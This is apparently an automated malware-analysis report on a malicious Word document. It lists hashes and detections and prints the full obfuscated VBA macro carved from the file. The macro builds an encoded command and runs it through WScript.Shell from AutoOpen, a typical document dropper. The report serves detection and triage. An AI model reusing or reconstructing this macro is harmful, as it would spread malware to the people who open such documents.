Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5664b29927baa7b6…

MALICIOUS

Office (OLE)

Size: 88.4 KB
Created: 2018-08-23 06:15:00
Authoring application: Microsoft Office Word
First seen: 2021-02-19
MD5: 8859ea950e051070ef298ee027c3429e
SHA-1: 2c12def6769f1ad64d4f368f0040c24822ae36d7
SHA-256: 5664b29927baa7b6ffb6c43cbf299deaca165faff69ebf39e0643a2e0e712b48
Risk score: 310

Heuristics 10

  • ClamAV: Doc.Malware.Ddma-6691546-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Ddma-6691546-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script:
    RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10174 bytes
SHA-256: 2f462063740cc6f749ffe21d76caa565ee21399bab85482d9904aef7e8fe8ec7
Detection: ClamAV: No threats found
Obfuscation or payload: likely
142 of 227 identifiers look randomly generated (e.g. 'ndsCifZXXbKzbi'); 1 string-concatenation chain(s), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "hVjmXUfjsT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TlGDwozEkCdrB"
Function YJzAntBCW()
On Error Resume Next
Error jZQhW / 6012 / 75010 * TSBRw
   Error TDOUc / sFalDk
   Error 86899 * hbpawV
UGUXAz = "MD /v^" + ":^" + "  ^ ^  " + " /r  " + " " + CStr(Chr(GcqwpJaKI + ndsCifZXXbKzbi + 34 + VpFFiKWwmlETb + pMnPirYnG)) + "  ^" + "s^Et" + " " + "P^" + "d=^="
Error 93843 * hsjdkz
rTJjc = "=^A" + "^A" + "gAAIA^" + "A" + "C^A^gA" + "AI" + "AACA" + "^gAA^I^" + "AAC^"
Error wZMYZw * zYFtQd * 59388 * niiiO
   Error GjwTL * SlisVr
   Error 95089 / DOuNI * 1460 * vQJOz
XqncitJXktd = "A^g^AAI" + "^AAC" + "Ag^" + "AAI" + "A^AC^" + "Ag" + "^A^AI^A" + "^0" + "^H^A^9B" + "^w^e" + "AgG"
Error 96959 / hrOnNj * vVbZD * 24619
   Error 50352 * lJKqa
   Error 6883 * wVlRkC / 83251 / Clwqz
jsfBvXPvORl = "Aj^" + "B" + "^A^d^AE" + "^" + "G" + "^AjB^" + "Qf^" + "AsD^ArB" + "Q^Y^A"
Error 76623 * DSYCU * QWCUw / czjGHU
   Error OcOsj / pnHPc * 25901 / MKEWwk
qDQQicdr = "^U^GA^y" + "B^gY" + "AsD^AzB" + "^gY^A" + "^0E^" + "A^" + "k" + "^A^AI"
YJzAntBCW = UGUXAz + rTJjc + XqncitJXktd + jsfBvXPvORl + qDQQicdr
   Error LZwLE / pomcFS
   Error vTdsU / 44546 / MIRBjN * QqQsN
   Error zHzFJR / jOhTi
End Function
Function hqNLz()
On Error Resume Next
Error 34002 / ndMoLK / TMrsmA * ZPVCjf
   Error 62940 * QbvYVo
   Error dbhDul / hEZDzQ * 46507 / aVmUk
fvnQDbpw = "^A0^G^A" + "l" + "^BA" + "dA" + "^"
Error 55856 / KJAXB * 77114 * PiWIAm
   Error zuQbwM * tHHNJm
VrKcfjhd = "k" + "EA^t^" + "A" + "Q^Z^" + "A^s^GA" + "vB" + "gdA^" + "4^" + "GAJ" + "B^w^"
Error 75202 * jPuujf / jwlim * mErmYW
SoswLiMPfIT = "OAkCA" + "zB^gY^" + "A^" + "0E" + "Ak" + "AAI^A^" + "w"
Error 66932 * bduoC
   Error 84803 * zBzbE * 54251 * uVaWD
pazpalz = "CA" + "vBg^eAw" + "^GAk" + "AA" + "^KAU^" + "GA^s" + "^B^Q"
Error ZrjKMH * YBwzi * WdWCAM * fMCnl
   Error WGYSV * ISQHit / 52776 * 14239
   Error jIJRz / HopGiY * rzTGG / pLLpn
   Error 55687 * kEIznP * KrGvtm / CHsqJ
pjkfSickd = "aAYEA" + "k^BQY^A" + "8^G" + "A" + "^sB"
Error 57359 / shDNPX * 12216 * NzWwUM
   Error 38468 / RPcti
   Error aOFRX / PNZpj
   Error 7208 / YQjMo / pbHJN * sZcEuS
YFQHjOwTCdV = "g^" + "b^AcH^A" + "v" + "^B" + "AR" + "^A^4C^A" + "YBg" + "^" + "d^Ac" + "HAk^Aw"
Error 23376 / kkBNB
   Error iwmAS / NAhJYi / loLrit * onPjp
   Error 17587 * bOzYFX / 458 / MYSudt
   Error 98075 / ljqtM * 81682 / 82083
homHA = "e" + "^AkH" + "Ay^B" + "^A^dA" + "s^HA^p^" + "AA"
hqNLz = fvnQDbpw + VrKcfjhd + SoswLiMPfIT + pazpalz + pjkfSickd + YFQHjOwTCdV + homHA
   Error YTKzZJ * HwSLza
   Error iSvNl / CEPRYC
   Error 34466 * fXvZJj * 14523 * UviCLY
End Function
Function ZNJizjw()
On Error Resume Next
Error 18655 * uOCUL * SUWmn * qYIGYm
HtrBuYTCi = "^a^As^" + "EA^" + "M^B^A^J" + "^A^ACAu" + "^B^Q^a" + "^A^AC^" + "Av^Bg^e" + "Aw^" + "GAkAA" + "KA^g^G"
Error awLAa * zDbOqI / dSzZz / VTwzbj
   Error GimlH * jwpok
   Error 38241 / ivzEZj
   Error 30226 / tiWOu / AGjJoF / 32748
MLipMAnz = "Aj^B" + "Q" + "Y^AU" + "GAy^Bw" + "bA^YG^A" + "7A^wJ^A"
Error 77883 * PbpDz
   Error knsSW / ZJfWqE * isAFG / 44037
   Error 22232 / HiPDc * kQGbtZ * dikifc
ZKwlJC = "U^G" + "^A^4^B^" + "Q" + "Z^A^4" + "CAnA" + "wK^A" + "o^F^A^H" + "B^"
Error 2153 / lCbwSn / YCMGV * BGSzJb
SsOMwEnPTF = "QbA^QC^" + "Ar^AwJ" + "Aw^F" + "^An" + "^A^wK^A" + "M" + "GA^pB" + "A"
Error 74994 / 400 * GYwMib * Kmmvvq
   Error VRznr / NFwwn
   Error 23308 * 27080
   Error EUZWbj / aBUjrG * 31569 * 90074
lwTSrkwt = "bA^IG" + "A1" + "B^Ac^A" + "^o^D" + "^A^" + "2B" + "^g^b" + "^A^"
Error FlMzM / MQclJ
hSrwnJzQ = "UGA^kA^" + "Q^P^A^" + "M^H^A" + "i^B" + "^QTA" + "QC" + "A7^A" + "wJ^AkD" + "^A3^AQ" + "NA" + "c"
Error habJC * PDJIN / 51104 / lzMjk
   Error ZUjBr / XkNszw / mfjlGZ / uwjzXd
   Error 12064 * EFSnGJ / 16736 * 75003
UwSrHN = "CA^g^" + "AQ^P" + "^A" + "^AC^A^" + "a^B" + "^wR^"
Error SNkfp * LPjQF
   Error ZKQXao * dNmqvU
   Error 77957 / dYtDmM
PBvZzSq = "A^0G^" + "Ak^A^w^" + "O" + "A^" + "kC^A" + "n^A" + "^AQ^" + "Ac" + "C^Ao"
Error EaujVB / LvQmfO * wZHRZv / TwPZB
   Error nzTmL / MrPJPm / unbWS * NcjMX
tjdof = "^A^A" + "^d" + "^A^k^G^" + "A^s" + "B^Ac" + "^A" + "M^F"
Error 43531 / qDSPDY / wQZlbi / Uqbjo
   Error EzCMbb * LvZUca * zsuYis * 95308
   Error HnvbPj * zjnNAw
cJFBDUbcWA = "A^uAw" + "^JA^Y^" + "F^A^0" + "^Agc^A^" + "U^GA" + "K^BQM^" + "AkD^A" + "v^A" + "^A^d^A" + "U^GA^"
Error QzEbX / jLFkst / 17370 * CJFLp
   Error Kiczs * rwlcKq / hKOuuY * BEIFsv
   Error 95382 * SVSWY / KtwlE * DbzQm
VHwJfWSzU = "u^B^g" + "LAc^GA^" + "u" + "^BQa" + "^A^" + "s^G^" + "A^jB" + "Q" + "YA^g^" + "G^" + "Au^B" + "^" + "gc^"
Error 19858 / aWFwT / dtXNsA * tmQPEC
   Error 69467 * XocmH
   Error rEzzo / QbdfU / PUIhDT / suKRQ
EPdqImLuY = "AEG" + "A" + "lB" + "^" + "AbA^4" + "CA" + "^kB^A^" + "Z^A^"
Error pIRnl * nGcQF
   Error 39829 * SwzHt * MiXWZ * QTjjFM
   Error bWcChs * CDBJOC
   Error hRiwqF * jBwla
NwbzWw = "8^GAv^" + "AwL^AoD" + "A^" + "w^B^A^" + "d^A^" + "Q" + "HAo^" + "B^AQ^A^" + "gD^A3A^" + "wQA" + "^U^H^" + "A^GB" + "AeA8C^A"
ZNJizjw = HtrBuYTCi + MLipMAnz + ZKwlJC + SsOMwEnPTF + lwTSrkwt + hSrwnJzQ + UwSrHN + PBvZzSq + tjdof + cJFBDUbcWA + VHwJfWSzU + EPdqImLuY + NwbzWw
   Error 72455 * LNkPG
   Error MKwnK / boZzKo / 31181 / lckQi
   Error 40897 * MOuNVL
   Error 39107 * jNCoj / 92125 * wZBVJ
End Function
Function MFUYYiizJu()
On Error Resume Next
Error Qzisw / Qwohz / 51624 / kfSPLF
   Error 9490 * nrnEdv / 60951 / LzRFa
TzEwlON = "t^B^wb" + "A^MGA" + "u" + "A^QZAAH" + "^" + "AvBAa^"
Error 17374 * kziBz / 89377 / Klcjz
Znnwhu = "AsGA" + "^y^" + "B^Q^aA" + "^sGAtB^" + "Q^aAQ^H" + "^A^u^" + "AAd" + "A^M" + "^HA^lB" + "Ad" + "^A^8CA"
Error zkXrnD / fiJkFi * SUQSRQ * 89366
   Error IHWvzX / UzjfiC * UiXHpz * OTQCTW
cbckqEMd = "vA^g^O^" + "A" + "A" + "H" + "^A0^BAd" + "^A^g^GA" + "ABwZAk" + "^DApB^"
Error ditnG / 86234 / AQWCwI * PqXCoz
inistzWwkic = "w^T^AYG" + "A1A" + "^" + "wL" + "^A^0^G" + "^AvB^wY" + "^A4CAp" + "B^w^Y" + "AcGA" + "^hBAZ" + "^A^I"
Error JJYpd * pIfTMd
   Error jBwmB * zDlsF
wlriSO = "H" + "A" + "^1B^" + "wZ^A" + "^o" + "H" + "Av^B^g^" + "L" + "A8G"
Error izTUC * AhjIw
   Error MPzrc / vXOizp
   Error rWvNlT / mKGdu / SQGCY / 20082
NrqPOuZka = "As" + "^" + "B^Q^a^" + "A^YGA" + "^j^B^" + "Q" + "^YA" + "^I^H^" + "A^h"
Error 28760 / JFstj / 25735 * btiNN
mIvCiYWr = "^Bw^LA" + "8CA^6A" + "^AcAQH" + "A^0" + "^B" + "^A" + "^a^" + "AA^E" + "A" + "3" + "^"
Error PQTihQ * 71606 / aDGlX * rVzuYi
   Error 75912 / UZFjNE / 95359 / TIqzG
   Error 96305 * PPGBJL / 90877 / 48608
FasSU = "B^" + "w^LAw^G" + "A^w^B^g" + "L^A^Q" + "^G^" + "A" + "^0A^Q^" + "YA^" + "U^GA" + "nBwbA^" + "I" + "^"
Error wclAu / isHJn / 26751 * 2001
ZVDQADkIEK = "H^Aw^B^" + "w^L" + "^A^8C" + "A6^A^Ac" + "^AQ^H" + "^A^" + "0B^A" + "aAA^E" + "A^h^" + "B" + "^g" + "YA^8C" + "AtBw^b^"
Error 55605 / 87463 / 74667 / hBkOjs
   Error 11343 / nqvuNb / RjISG / UbIIZ
   Error 46063 * fzFbhY
oiLcvjkqDV = "A^M^G" + "Au^A^w" + "c^AcGA^" + "uB^" + "Qa" + "AY^HAh" + "^B^wcAk" + "HAn^Bg" + "cAUGAuB" + "Q^" + "ZA" + "^w" + "G^"
Error Zwrpp * LOFUz
   Error UVOjJF / TLBJPp * 17384 / CVisFA
   Error 17880 * fmEzLK / YiQRjw * PTEpOv
   Error 42955 * BmCKG / 48002 * 48358
koWcEpGzJF = "AhB" + "^wY^" + "A4G" + "A" + "^y" + "^BQ^Z" + "^A^g^G" + "A^0^B" + "^QdA8^G" + "A^z^BwL" + "A^8C^" + "A^6"
Error MnAWAc * BSllY / 83525 * GuOYA
   Error 30 / TLkqFo
zwPShswRRrj = "AAc^AQ" + "^" + "HA0^B" + "AaAc" + "CA^9" + "^" + "A^Aa^A" + "^s" + "^EA^M" + "B^A^J" + "A^s"
MFUYYiizJu = TzEwlON + Znnwhu + cbckqEMd + inistzWwkic + wlriSO + NrqPOuZka + mIvCiYWr + FasSU + ZVDQADkIEK + oiLcvjkqDV + koWcEpGzJF + zwPShswRRrj
   Error TbhMcw / bDIFpb
   Error Ywwuuk * wIbZSv * CqzVWF / iRlzS
   Error 27099 / GmKizZ * 85956 * pjpUI
End Function
Function ZOkwWAJDMS()
On Error Resume Next
Error 41038 / kQlCIq * NfIcc / kDdrj
Hvmfd = "^D^A^0B" + "^gbAU^G" + "^A^" + "pBAbA^M" + "^" + "E^" + "Ai^B^QZ" + "^A" + "c^F" + "A^uA^" + "A^d"
Error IhsjLU / 69250
   Error cwEjh * bbGCm
   Error UFbNu / NzbZjd
hmalo = "A" + "^UG^A^O" + "^B" + "AIAQ" + "H^AjBQ^" + "Z^AoG" + "^A^i^B" + "w^" + "bA^0C^"
Error iwtnnY * aREOkT * YZJdm / 7029
   Error 23905 / FXXMVN / iNfvsi / ivSXKW
   Error rzQpAf / Awdabc / 96007 * DUCMT
   Error 18700 / QDitz * 21662 * uvwApw
   Error 18349 * 79432
   Error 31757 / jRwXv / 61058 / mEtLQT
TzqmfbVD = "A3B^QZ" + "A4" + "G" + "A^9" + "AAW^AY"
Error 69776 / DXKQww / 71697 / 80320
   Error udSKrH * Edzlhf * 23231 * DVZRK
ohjCdqal = "HA^" + "3^B" + "^AJ " + "e^" + "- ^l" + "^le^h^s" + "r^e^" + "wop&& " + " " + " ^f^" + "O"
Error zFXIj / cwsaOZ / 35151 * nQSjZS
   Error sHlcp / WARaup
   Error owZqR * jPmjr
   Error ciCDzX * 39098 * 51231 * vzzCj
NDFYhzVlMI = "r /^L " + "%^o ^" + "iN ( 9" + "^9^7" + "^ ^-1 ^"
Error AcsjJP * KKfvO / OPQXN * HOQWt
   Error WNArT / 44053
zwpajZisYCw = "0)  d^" + "o " + "   ^s" + "^et" + " " + "  ^pR" + "^U" + "D" + "=" + "!" + "^pR^" + "UD!!"
Error vfsJZ / vNwaO * BuVOmd * BIzjT
zuNPKshjm = "P^d:~ " + "   %^" + "o, 1!" + "&&i^F %" + "^o   ^L" + "E^" + "Q ^0 " + " C^A^L"
Error mrtzw * DDHfd / 83224 * qOoQqw
   Error QkFwY / NdfRW / sOATq / jzNtC
XiBsQwsiEhA = "l  " + "%" + "^pR^UD" + ":^~^ ^" + "-^9^9^8" + "% " + "  " + CStr(Chr(JqwdOPQREVCzO + uPzaGvaJ + 34 + oTuAwCziuAfBJ + DKswnOYmYzJpf)) + "    "
ZOkwWAJDMS = Hvmfd + hmalo + TzqmfbVD + ohjCdqal + NDFYhzVlMI + zwpajZisYCw + zuNPKshjm + XiBsQwsiEhA
   Error 63979 / HisKWW
End Function

Attribute VB_Name = "DUcAahTi"
Sub AutoOpen()
On Error Resume Next
   Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF
   Error EYHSt * oNCwD / 50375 * TGfFQW
End Sub